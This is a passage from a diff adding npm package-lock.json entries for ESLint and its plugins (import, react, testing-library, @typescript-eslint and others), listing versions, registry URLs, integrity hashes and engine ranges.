"sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/escodegen": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-2.1.0.tgz", + "integrity": "sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w==", + "dev": true, + "dependencies": { + "esprima": "^4.0.1", + "estraverse": "^5.2.0", + "esutils": "^2.0.2" + }, + "bin": { + "escodegen": "bin/escodegen.js", + "esgenerate": "bin/esgenerate.js" + }, + "engines": { + "node": ">=6.0" + }, + "optionalDependencies": { + "source-map": "~0.6.1" + } + }, + "node_modules/eslint": { + "version": "8.57.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.57.0.tgz", 
+ "integrity": "sha512-dZ6+mexnaTIbSBZWgou51U6OmzIhYM2VcNdtiTtI7qPNZm35Akpr0f6vtw3w1Kmn5PYo+tZVfh13WrhpS6oLqQ==", + "dependencies": { + "@eslint-community/eslint-utils": "^4.2.0", + "@eslint-community/regexpp": "^4.6.1", + "@eslint/eslintrc": "^2.1.4", + "@eslint/js": "8.57.0", + "@humanwhocodes/config-array": "^0.11.14", + "@humanwhocodes/module-importer": "^1.0.1", + "@nodelib/fs.walk": "^1.2.8", + "@ungap/structured-clone": "^1.2.0", + "ajv": "^6.12.4", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.2", + "debug": "^4.3.2", + "doctrine": "^3.0.0", + "escape-string-regexp": "^4.0.0", + "eslint-scope": "^7.2.2", + "eslint-visitor-keys": "^3.4.3", + "espree": "^9.6.1", + "esquery": "^1.4.2", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^6.0.1", + "find-up": "^5.0.0", + "glob-parent": "^6.0.2", + "globals": "^13.19.0", + "graphemer": "^1.4.0", + "ignore": "^5.2.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "is-path-inside": "^3.0.3", + "js-yaml": "^4.1.0", + "json-stable-stringify-without-jsonify": "^1.0.1", + "levn": "^0.4.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.1.2", + "natural-compare": "^1.4.0", + "optionator": "^0.9.3", + "strip-ansi": "^6.0.1", + "text-table": "^0.2.0" + }, + "bin": { + "eslint": "bin/eslint.js" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-config-prettier": { + "version": "8.5.0", + "resolved": "https://registry.npmjs.org/eslint-config-prettier/-/eslint-config-prettier-8.5.0.tgz", + "integrity": "sha512-obmWKLUNCnhtQRKc+tmnYuQl0pFU1ibYJQ5BGhTVB08bHe9wC8qUeG7c08dj9XX+AuPj1YSGSQIHl1pnDHZR0Q==", + "dev": true, + "bin": { + "eslint-config-prettier": "bin/cli.js" + }, + "peerDependencies": { + "eslint": ">=7.0.0" + } + }, + "node_modules/eslint-config-standard": { + "version": "17.0.0", + "resolved": "https://registry.npmjs.org/eslint-config-standard/-/eslint-config-standard-17.0.0.tgz", + "integrity": "sha512-/2ks1GKyqSOkH7JFvXJicu0iMpoojkwB+f5Du/1SC0PtBL+s8v30k9njRZ21pm2drKYm2342jFnGWzttxPmZVg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "peerDependencies": { + "eslint": "^8.0.1", + "eslint-plugin-import": "^2.25.2", + "eslint-plugin-n": "^15.0.0", + "eslint-plugin-promise": "^6.0.0" + } + }, + "node_modules/eslint-config-standard-jsx": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/eslint-config-standard-jsx/-/eslint-config-standard-jsx-11.0.0.tgz", + "integrity": "sha512-+1EV/R0JxEK1L0NGolAr8Iktm3Rgotx3BKwgaX+eAuSX8D952LULKtjgZD3F+e6SvibONnhLwoTi9DPxN5LvvQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "peerDependencies": { + "eslint": "^8.8.0", + "eslint-plugin-react": "^7.28.0" + } + }, + "node_modules/eslint-import-resolver-node": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/eslint-import-resolver-node/-/eslint-import-resolver-node-0.3.6.tgz", + "integrity": "sha512-0En0w03NRVMn9Uiyn8YRPDKvWjxCWkslUEhGNTdGx15RvPJYQ+lbOlqrlNI2vEAs4pDYK4f/HN2TbDmk5TP0iw==", + "dev": true, + "dependencies": { + "debug": "^3.2.7", + "resolve": "^1.20.0" + } + }, + 
"node_modules/eslint-import-resolver-node/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-module-utils": { + "version": "2.7.3", + "resolved": "https://registry.npmjs.org/eslint-module-utils/-/eslint-module-utils-2.7.3.tgz", + "integrity": "sha512-088JEC7O3lDZM9xGe0RerkOMd0EjFl+Yvd1jPWIkMT5u3H9+HC34mWWPnqPrN13gieT9pBOO+Qt07Nb/6TresQ==", + "dev": true, + "dependencies": { + "debug": "^3.2.7", + "find-up": "^2.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/eslint-module-utils/node_modules/find-up": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-2.1.0.tgz", + "integrity": "sha1-RdG35QbHF93UgndaK3eSCjwMV6c=", + "dev": true, + "dependencies": { + "locate-path": "^2.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/locate-path": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-2.0.0.tgz", + "integrity": "sha1-K1aLJl7slExtnA3pw9u7ygNUzY4=", + "dev": true, + "dependencies": { + "p-locate": "^2.0.0", + "path-exists": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/p-limit": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-1.3.0.tgz", + "integrity": "sha512-vvcXsLAJ9Dr5rQOPk7toZQZJApBl2K4J6dANSsEuh6QI41JYcsS/qhTGa9ErIUUgK3WNQoJYvylxvjqmiqEA9Q==", + "dev": true, + "dependencies": { + "p-try": "^1.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/p-locate": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-2.0.0.tgz", + "integrity": "sha1-IKAQOyIqcMj9OcwuWAaA893l7EM=", + "dev": true, + "dependencies": { + "p-limit": "^1.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/p-try": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/p-try/-/p-try-1.0.0.tgz", + "integrity": "sha1-y8ec26+P1CKOE/Yh8rGiN8GyB7M=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-module-utils/node_modules/path-exists": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "integrity": "sha1-zg6+ql94yxiSXqfYENe1mwEP1RU=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-plugin-chai-expect": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-chai-expect/-/eslint-plugin-chai-expect-3.0.0.tgz", + "integrity": "sha512-NS0YBcToJl+BRKBSMCwRs/oHJIX67fG5Gvb4tGked+9Wnd1/PzKijd82B2QVKcSSOwRe+pp4RAJ2AULeck4eQw==", + "dev": true, + "engines": { + "node": "10.* || 12.* || >= 14.*" + }, + "peerDependencies": { + "eslint": ">=2.0.0 <= 8.x" + } + }, + "node_modules/eslint-plugin-chai-friendly": { + "version": "0.7.2", + "resolved": "https://registry.npmjs.org/eslint-plugin-chai-friendly/-/eslint-plugin-chai-friendly-0.7.2.tgz", + "integrity": 
"sha512-LOIfGx5sZZ5FwM1shr2GlYAWV9Omdi+1/3byuVagvQNoGUuU0iHhp7AfjA1uR+4dJ4Isfb4+FwBJgQajIw9iAg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + }, + "peerDependencies": { + "eslint": ">=3.0.0" + } + }, + "node_modules/eslint-plugin-cypress": { + "version": "2.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-cypress/-/eslint-plugin-cypress-2.15.1.tgz", + "integrity": "sha512-eLHLWP5Q+I4j2AWepYq0PgFEei9/s5LvjuSqWrxurkg1YZ8ltxdvMNmdSf0drnsNo57CTgYY/NIHHLRSWejR7w==", + "dev": true, + "dependencies": { + "globals": "^13.20.0" + }, + "peerDependencies": { + "eslint": ">= 3.2.1" + } + }, + "node_modules/eslint-plugin-cypress/node_modules/globals": { + "version": "13.23.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.23.0.tgz", + "integrity": "sha512-XAmF0RjlrjY23MA51q3HltdlGxUpXPvg0GioKiD9X6HD28iMjo2dKC8Vqwm7lne4GNr78+RHTfliktR6ZH09wA==", + "dev": true, + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint-plugin-es": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-es/-/eslint-plugin-es-4.1.0.tgz", + "integrity": "sha512-GILhQTnjYE2WorX5Jyi5i4dz5ALWxBIdQECVQavL6s7cI76IZTDWleTHkxz/QT3kvcs2QlGHvKLYsSlPOlPXnQ==", + "dev": true, + "peer": true, + "dependencies": { + "eslint-utils": "^2.0.0", + "regexpp": "^3.0.0" + }, + "engines": { + "node": ">=8.10.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=4.19.1" + } + }, + "node_modules/eslint-plugin-import": { + "version": "2.26.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-import/-/eslint-plugin-import-2.26.0.tgz", + "integrity": "sha512-hYfi3FXaM8WPLf4S1cikh/r4IxnO6zrhZbEGz2b660EJRbuxgpDS5gkCuYgGWg2xxh2rBuIr4Pvhve/7c31koA==", + "dev": true, + "dependencies": { + "array-includes": "^3.1.4", + "array.prototype.flat": "^1.2.5", + "debug": "^2.6.9", + "doctrine": "^2.1.0", + "eslint-import-resolver-node": "^0.3.6", + "eslint-module-utils": "^2.7.3", + "has": "^1.0.3", + "is-core-module": "^2.8.1", + "is-glob": "^4.0.3", + "minimatch": "^3.1.2", + "object.values": "^1.1.5", + "resolve": "^1.22.0", + "tsconfig-paths": "^3.14.1" + }, + "engines": { + "node": ">=4" + }, + "peerDependencies": { + "eslint": "^2 || ^3 || ^4 || ^5 || ^6 || ^7.2.0 || ^8" + } + }, + "node_modules/eslint-plugin-import/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/eslint-plugin-import/node_modules/doctrine": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-2.1.0.tgz", + "integrity": "sha512-35mSku4ZXK0vfCuHEDAwt55dg2jNajHZ1odvF+8SSr82EsZY4QmXfuWso8oEd8zRhVObSN18aM0CjSdoBX7zIw==", + "dev": true, + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/eslint-plugin-import/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=", + "dev": true + }, + "node_modules/eslint-plugin-jsx-a11y": { + "version": "6.7.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-jsx-a11y/-/eslint-plugin-jsx-a11y-6.7.1.tgz", + "integrity": 
"sha512-63Bog4iIethyo8smBklORknVjB0T2dwB8Mr/hIC+fBS0uyHdYYpzM/Ed+YC8VxTjlXHEWFOdmgwcDn1U2L9VCA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.20.7", + "aria-query": "^5.1.3", + "array-includes": "^3.1.6", + "array.prototype.flatmap": "^1.3.1", + "ast-types-flow": "^0.0.7", + "axe-core": "^4.6.2", + "axobject-query": "^3.1.1", + "damerau-levenshtein": "^1.0.8", + "emoji-regex": "^9.2.2", + "has": "^1.0.3", + "jsx-ast-utils": "^3.3.3", + "language-tags": "=1.0.5", + "minimatch": "^3.1.2", + "object.entries": "^1.1.6", + "object.fromentries": "^2.0.6", + "semver": "^6.3.0" + }, + "engines": { + "node": ">=4.0" + }, + "peerDependencies": { + "eslint": "^3 || ^4 || ^5 || ^6 || ^7 || ^8" + } + }, + "node_modules/eslint-plugin-jsx-a11y/node_modules/emoji-regex": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", + "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", + "dev": true + }, + "node_modules/eslint-plugin-mocha": { + "version": "10.1.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-mocha/-/eslint-plugin-mocha-10.1.0.tgz", + "integrity": "sha512-xLqqWUF17llsogVOC+8C6/jvQ+4IoOREbN7ZCHuOHuD6cT5cDD4h7f2LgsZuzMAiwswWE21tO7ExaknHVDrSkw==", + "dev": true, + "dependencies": { + "eslint-utils": "^3.0.0", + "rambda": "^7.1.0" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "eslint": ">=7.0.0" + } + }, + "node_modules/eslint-plugin-mocha/node_modules/eslint-utils": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-3.0.0.tgz", + "integrity": "sha512-uuQC43IGctw68pJA1RgbQS8/NP7rch6Cwd4j3ZBtgo4/8Flj4eGE7ZYSZRN3iq5pVUv6GPdW5Z1RFleo84uLDA==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^2.0.0" + }, + "engines": { + "node": "^10.0.0 || ^12.0.0 || >= 14.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=5" + } + }, + "node_modules/eslint-plugin-n": { + "version": "15.2.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-n/-/eslint-plugin-n-15.2.0.tgz", + "integrity": "sha512-lWLg++jGwC88GDGGBX3CMkk0GIWq0y41aH51lavWApOKcMQcYoL3Ayd0lEdtD3SnQtR+3qBvWQS3qGbR2BxRWg==", + "dev": true, + "peer": true, + "dependencies": { + "builtins": "^4.0.0", + "eslint-plugin-es": "^4.1.0", + "eslint-utils": "^3.0.0", + "ignore": "^5.1.1", + "is-core-module": "^2.3.0", + "minimatch": "^3.0.4", + "resolve": "^1.10.1", + "semver": "^6.3.0" + }, + "engines": { + "node": ">=12.22.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=7.0.0" + } + }, + "node_modules/eslint-plugin-n/node_modules/eslint-utils": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-3.0.0.tgz", + "integrity": "sha512-uuQC43IGctw68pJA1RgbQS8/NP7rch6Cwd4j3ZBtgo4/8Flj4eGE7ZYSZRN3iq5pVUv6GPdW5Z1RFleo84uLDA==", + "dev": true, + "peer": true, + "dependencies": { + "eslint-visitor-keys": "^2.0.0" + }, + "engines": { + "node": "^10.0.0 || ^12.0.0 || >= 14.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=5" + } + }, + "node_modules/eslint-plugin-node": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-node/-/eslint-plugin-node-11.1.0.tgz", + "integrity": "sha512-oUwtPJ1W0SKD0Tr+wqu92c5xuCeQqB3hSCHasn/ZgjFdA9iDGNkNf2Zi9ztY7X+hNuMib23LNGRm6+uN+KLE3g==", + "dev": true, + 
"dependencies": { + "eslint-plugin-es": "^3.0.0", + "eslint-utils": "^2.0.0", + "ignore": "^5.1.1", + "minimatch": "^3.0.4", + "resolve": "^1.10.1", + "semver": "^6.1.0" + }, + "engines": { + "node": ">=8.10.0" + }, + "peerDependencies": { + "eslint": ">=5.16.0" + } + }, + "node_modules/eslint-plugin-node/node_modules/eslint-plugin-es": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-es/-/eslint-plugin-es-3.0.1.tgz", + "integrity": "sha512-GUmAsJaN4Fc7Gbtl8uOBlayo2DqhwWvEzykMHSCZHU3XdJ+NSzzZcVhXh3VxX5icqQ+oQdIEawXX8xkR3mIFmQ==", + "dev": true, + "dependencies": { + "eslint-utils": "^2.0.0", + "regexpp": "^3.0.0" + }, + "engines": { + "node": ">=8.10.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=4.19.1" + } + }, + "node_modules/eslint-plugin-prettier": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-prettier/-/eslint-plugin-prettier-4.0.0.tgz", + "integrity": "sha512-98MqmCJ7vJodoQK359bqQWaxOE0CS8paAz/GgjaZLyex4TTk3g9HugoO89EqWCrFiOqn9EVvcoo7gZzONCWVwQ==", + "dev": true, + "dependencies": { + "prettier-linter-helpers": "^1.0.0" + }, + "engines": { + "node": ">=6.0.0" + }, + "peerDependencies": { + "eslint": ">=7.28.0", + "prettier": ">=2.0.0" + }, + "peerDependenciesMeta": { + "eslint-config-prettier": { + "optional": true + } + } + }, + "node_modules/eslint-plugin-promise": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-promise/-/eslint-plugin-promise-6.0.0.tgz", + "integrity": "sha512-7GPezalm5Bfi/E22PnQxDWH2iW9GTvAlUNTztemeHb6c1BniSyoeTrM87JkC0wYdi6aQrZX9p2qEiAno8aTcbw==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "peerDependencies": { + "eslint": "^7.0.0 || ^8.0.0" + } + }, + "node_modules/eslint-plugin-react": { + "version": "7.32.2", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.32.2.tgz", + "integrity": "sha512-t2fBMa+XzonrrNkyVirzKlvn5RXzzPwRHtMvLAtVZrt8oxgnTQaYbU6SXTOO1mwQgp1y5+toMSKInnzGr0Knqg==", + "dev": true, + "dependencies": { + "array-includes": "^3.1.6", + "array.prototype.flatmap": "^1.3.1", + "array.prototype.tosorted": "^1.1.1", + "doctrine": "^2.1.0", + "estraverse": "^5.3.0", + "jsx-ast-utils": "^2.4.1 || ^3.0.0", + "minimatch": "^3.1.2", + "object.entries": "^1.1.6", + "object.fromentries": "^2.0.6", + "object.hasown": "^1.1.2", + "object.values": "^1.1.6", + "prop-types": "^15.8.1", + "resolve": "^2.0.0-next.4", + "semver": "^6.3.0", + "string.prototype.matchall": "^4.0.8" + }, + "engines": { + "node": ">=4" + }, + "peerDependencies": { + "eslint": "^3 || ^4 || ^5 || ^6 || ^7 || ^8" + } + }, + "node_modules/eslint-plugin-react-hooks": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-react-hooks/-/eslint-plugin-react-hooks-4.6.0.tgz", + "integrity": "sha512-oFc7Itz9Qxh2x4gNHStv3BqJq54ExXmfC+a1NjAta66IAN87Wu0R/QArgIS9qKzX3dXKPI9H5crl9QchNMY9+g==", + "dev": true, + "engines": { + "node": ">=10" + }, + "peerDependencies": { + "eslint": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0-0" + } + }, + "node_modules/eslint-plugin-react/node_modules/doctrine": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-2.1.0.tgz", + "integrity": "sha512-35mSku4ZXK0vfCuHEDAwt55dg2jNajHZ1odvF+8SSr82EsZY4QmXfuWso8oEd8zRhVObSN18aM0CjSdoBX7zIw==", + "dev": true, + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + 
"node_modules/eslint-plugin-react/node_modules/resolve": { + "version": "2.0.0-next.4", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-2.0.0-next.4.tgz", + "integrity": "sha512-iMDbmAWtfU+MHpxt/I5iWI7cY6YVEZUQ3MBgPQ++XD1PELuJHIl82xBmObyP2KyQmkNB2dsqF7seoQQiAn5yDQ==", + "dev": true, + "dependencies": { + "is-core-module": "^2.9.0", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/eslint-plugin-testing-library": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-testing-library/-/eslint-plugin-testing-library-7.1.1.tgz", + "integrity": "sha512-nszC833aZPwB6tik1nMkbFqmtgIXTT0sfJEYs0zMBKMlkQ4to2079yUV96SvmLh00ovSBJI4pgcBC1TiIP8mXg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/scope-manager": "^8.15.0", + "@typescript-eslint/utils": "^8.15.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0", + "pnpm": "^9.14.0" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/scope-manager": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.21.0.tgz", + "integrity": "sha512-G3IBKz0/0IPfdeGRMbp+4rbjfSSdnGkXsM/pFZA8zM9t9klXDnB/YnKOBQ0GoPmoROa4bCq2NeHgJa5ydsQ4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.21.0", + "@typescript-eslint/visitor-keys": "8.21.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/types": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.21.0.tgz", + "integrity": "sha512-PAL6LUuQwotLW2a8VsySDBwYMm129vFm4tMVlylzdoTybTHaAi0oBp7Ac6LhSrHHOdLM3efH+nAR6hAWoMF89A==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/typescript-estree": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/typescript-estree/-/typescript-estree-8.21.0.tgz", + "integrity": "sha512-x+aeKh/AjAArSauz0GiQZsjT8ciadNMHdkUSwBB9Z6PrKc/4knM4g3UfHml6oDJmKC88a6//cdxnO/+P2LkMcg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.21.0", + "@typescript-eslint/visitor-keys": "8.21.0", + "debug": "^4.3.4", + "fast-glob": "^3.3.2", + "is-glob": "^4.0.3", + "minimatch": "^9.0.4", + "semver": "^7.6.0", + "ts-api-utils": "^2.0.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "typescript": ">=4.8.4 <5.8.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/utils": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-8.21.0.tgz", + "integrity": "sha512-xcXBfcq0Kaxgj7dwejMbFyq7IOHgpNMtVuDveK7w3ZGwG9owKzhALVwKpTF2yrZmEwl9SWdetf3fxNzJQaVuxw==", + "dev": true, + "license": "MIT", + "dependencies": { + 
"@eslint-community/eslint-utils": "^4.4.0", + "@typescript-eslint/scope-manager": "8.21.0", + "@typescript-eslint/types": "8.21.0", + "@typescript-eslint/typescript-estree": "8.21.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0", + "typescript": ">=4.8.4 <5.8.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.21.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.21.0.tgz", + "integrity": "sha512-BkLMNpdV6prozk8LlyK/SOoWLmUFi+ZD+pcqti9ILCbVvHGk1ui1g4jJOc2WDLaeExz2qWwojxlPce5PljcT3w==", + "dev": true, + "license": "MIT", + "dependencies": { + "@typescript-eslint/types": "8.21.0", + "eslint-visitor-keys": "^4.2.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/eslint-visitor-keys": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-4.2.0.tgz", + "integrity": "sha512-UyLnSehNt62FFhSwjZlHmeokpRK59rcz29j+F1/aDgbkbRTk7wIc9XzdoasMUbRNKDM0qQt/+BJ4BrpFeABemw==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint-plugin-testing-library/node_modules/ts-api-utils": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-2.0.0.tgz", + "integrity": 
